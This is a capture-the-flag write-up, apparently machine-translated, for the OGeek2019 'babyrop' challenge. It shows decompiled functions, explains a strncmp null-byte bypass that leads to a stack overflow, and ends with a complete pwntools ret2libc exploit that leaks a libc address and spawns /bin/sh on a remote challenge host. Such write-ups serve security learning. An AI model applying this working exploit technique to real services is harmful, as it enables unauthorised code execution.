[OGeek2019]babyrop

[OGeek2019]babyrop

checksec 32 Bit program , Other problems are not serious

main function

int __cdecl main()
{
    
  int buf; // [esp+4h] [ebp-14h]
  char v2; // [esp+Bh] [ebp-Dh]
  int fd; // [esp+Ch] [ebp-Ch]

  f1();
  fd = open("/dev/urandom", 0); # Read a random number 
  if ( fd > 0 ) # Judge whether the random number is greater than 0
    read(fd, &buf, 4u);#  hold fd Write 4 individual bit To &buf 
  v2 = f2(buf); # v2  be equal to f2 The return value of 
  f3(v2); 
  return 0;
}

f1 function Initialization operation , Is to empty the buffer , Nothing to say

f2 function

f2 The use of is read The function will read 0x20 A string , however buf Only 8 size , however buf leave ebp The distance is 0x2c, Far from reaching the coverage return
addr Purpose , however f2 The function returns a value v5 to f3 As a parameter ,strncmp
It can be used \x00 Bypass , stay f3 in v5 As long as its length is not equal to 127 Overflow of any length can be completed

int __cdecl sub_804871F(int a1)
{
    
  size_t v1; // eax
  char s; // [esp+Ch] [ebp-4Ch]
  char buf[7]; // [esp+2Ch] [ebp-2Ch]
  unsigned __int8 v5; // [esp+33h] [ebp-25h]
  ssize_t v6; // [esp+4Ch] [ebp-Ch]

  memset(&s, 0, 0x20u);
  memset(buf, 0, 0x20u);
  sprintf(&s, "%ld", a1); # hold a1 Read to  s
  v6 = read(0, buf, 0x20u);#  Read from terminal 0x20 String to buf
  buf[v6 - 1] = 0;
  v1 = strlen(buf); # buf The length of 
  if ( strncmp(buf, &s, v1) ) # Compare  buf  and  s  The comparison number is v1 That is to say buf The length of 
    exit(0);
  write(1, "Correct\n", 8u);
  return v5;
}

f3 function

We can see that the key utilization points are f3 On ,f3 Of else sentence ,read Read in a1 Value ,a1 The value of is f2 The return value of is v5, We are f2 Functions can be overridden to control v5 Value , thus rop The chain has been constructed

ssize_t __cdecl sub_80487D0(char a1)
{
    
  ssize_t result; // eax
  char buf; // [esp+11h] [ebp-E7h]

  if ( a1 == 127 ) # If a1 be equal to 127  Just read in 0xc8 A string 
    result = read(0, &buf, 0xC8u);
  else #  If a1 It's not equal to 127 Just read in a1 Length string 
    result = read(0, &buf, a1);
  return result;
}

exp

from pwn import *

io = process("./pwn")
io = remote("node4.buuoj.cn",26505)
elf = ELF("./pwn")
libc = ELF("libc-2.23.so")

context(log_level="debug",arch="i386")

write_plt = elf.plt["write"]
read_got = elf.got["read"]
main_func = 0x08048825

payload1 = "\x00" + "\xff"*7

io.sendline(payload1)
io.recvline()
payload2 = flat(["a"*0xE7,"b"*4,write_plt,main_func,1,read_got,0x8])

io.sendline(payload2)

read_addr = u32(io.recv(4))
print read_addr

libcbase = read_addr - libc.symbols["read"]
#print libcbase
system_addr = libcbase + libc.symbols["system"]
binsh = libcbase + next(libc.search("/bin/sh"))
print binsh
payload3 = flat(["a"*0xe7,"b"*4,system_addr,0,binsh])

io.sendline(payload1)
io.recvline()
io.sendline(payload3)

io.interactive()